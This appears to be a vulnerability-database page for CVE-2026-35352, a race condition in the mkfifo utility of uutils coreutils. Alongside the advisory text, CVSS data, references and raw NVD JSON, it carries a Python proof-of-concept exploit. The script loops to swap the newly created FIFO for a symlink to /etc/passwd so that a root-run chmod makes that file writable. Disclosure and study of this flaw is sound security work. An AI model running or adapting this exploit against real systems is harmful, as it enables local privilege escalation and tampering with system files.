CVE-2026-35352

Description

A Time-of-Check to Time-of-Use (TOCTOU) race condition exists in the mkfifo utility of uutils coreutils. The utility creates a FIFO and then performs a path-based chmod to set permissions. A local attacker with write access to the parent directory can swap the newly created FIFO for a symbolic link between these two operations. This redirects the chmod call to an arbitrary file, potentially enabling privilege escalation if the utility is run with elevated privileges.

CVSS Details

CVSS Score

7.0

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:* - VULNERABLE

uutils coreutils (修复前的版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
PoC for CVE-2026-35352: TOCTOU Race Condition in uutils coreutils mkfifo
This script attempts to exploit the race condition between mkfifo creation and chmod.
"""

import os
import time
import sys

# Configuration
FIFO_NAME = "vuln_fifo"
TARGET_FILE = "/etc/passwd"  # Target file to modify permissions
WORK_DIR = "/tmp/cve_2026_35352_poc"

def setup():
    """Create the working directory"""
    if not os.path.exists(WORK_DIR):
        os.makedirs(WORK_DIR)
    os.chdir(WORK_DIR)
    print(f"[*] Working in {WORK_DIR}")

def exploit():
    """
    Simulates the race condition.
    Note: In a real scenario, this must be run concurrently with the vulnerable mkfifo process.
    The goal is to swap the FIFO with a symlink before chmod is called.
    """
    print("[*] Starting race condition loop...")
    print("[*] Waiting for the vulnerable process (mkfifo) to create the FIFO...")
    
    attempts = 0
    while attempts < 10000:
        try:
            # Check if FIFO exists and is not a symlink (the window of opportunity)
            if os.path.exists(FIFO_NAME) and not os.path.islink(FIFO_NAME):
                # Attempt to swap the file with a symlink to a privileged file
                os.remove(FIFO_NAME)
                os.symlink(TARGET_FILE, FIFO_NAME)
                print(f"[+] Attempt {attempts}: Swapped {FIFO_NAME} with symlink to {TARGET_FILE}")
                
                # Verify if the exploit was successful (check if target is writable)
                # This assumes the chmod 777 (or similar) happened on the target
                if os.access(TARGET_FILE, os.W_OK):
                    print(f"[+] SUCCESS! {TARGET_FILE} is now writable.")
                    return True
            
            # If it's already a symlink, reset it to allow the race to continue (simulation)
            elif os.path.islink(FIFO_NAME):
                os.remove(FIFO_NAME)
                
        except FileNotFoundError:
            pass
        except Exception as e:
            print(f"[-] Error: {e}")
            
        attempts += 1
        time.sleep(0.0001) # Short sleep to reduce CPU usage
        
    print("[-] Failed to win race condition within the limit.")
    return False

if __name__ == "__main__":
    if os.geteuid() != 0:
        print("[!] Warning: This exploit usually requires the victim process to run as root.")
    setup()
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35352
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35352
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35352/
[4] VulDB https://vuldb.com/cve/CVE-2026-35352
[5] https://github.com/uutils/coreutils/issues/10020
[6] http://www.openwall.com/lists/oss-security/2026/05/04/4
[7] http://www.openwall.com/lists/oss-security/2026/05/04/5
[8] http://www.openwall.com/lists/oss-security/2026/05/04/6
[9] https://github.com/uutils/coreutils/issues/10020

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35352", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:37.597", "lastModified": "2026-05-04T18:16:28.370", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Time-of-Check to Time-of-Use (TOCTOU) race condition exists in the mkfifo utility of uutils coreutils. The utility creates a FIFO and then performs a path-based chmod to set permissions. A local attacker with write access to the parent directory can swap the newly created FIFO for a symbolic link between these two operations. This redirects the chmod call to an arbitrary file, potentially enabling privilege escalation if the utility is run with elevated privileges."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:*", "matchCriteriaId": "4A9AF9E4-E17C-48AD-8051-B49998618839"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/issues/10020", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/04/4", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/04/5", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/04/6", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://github.com/uutils/coreutils/issues/10020", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}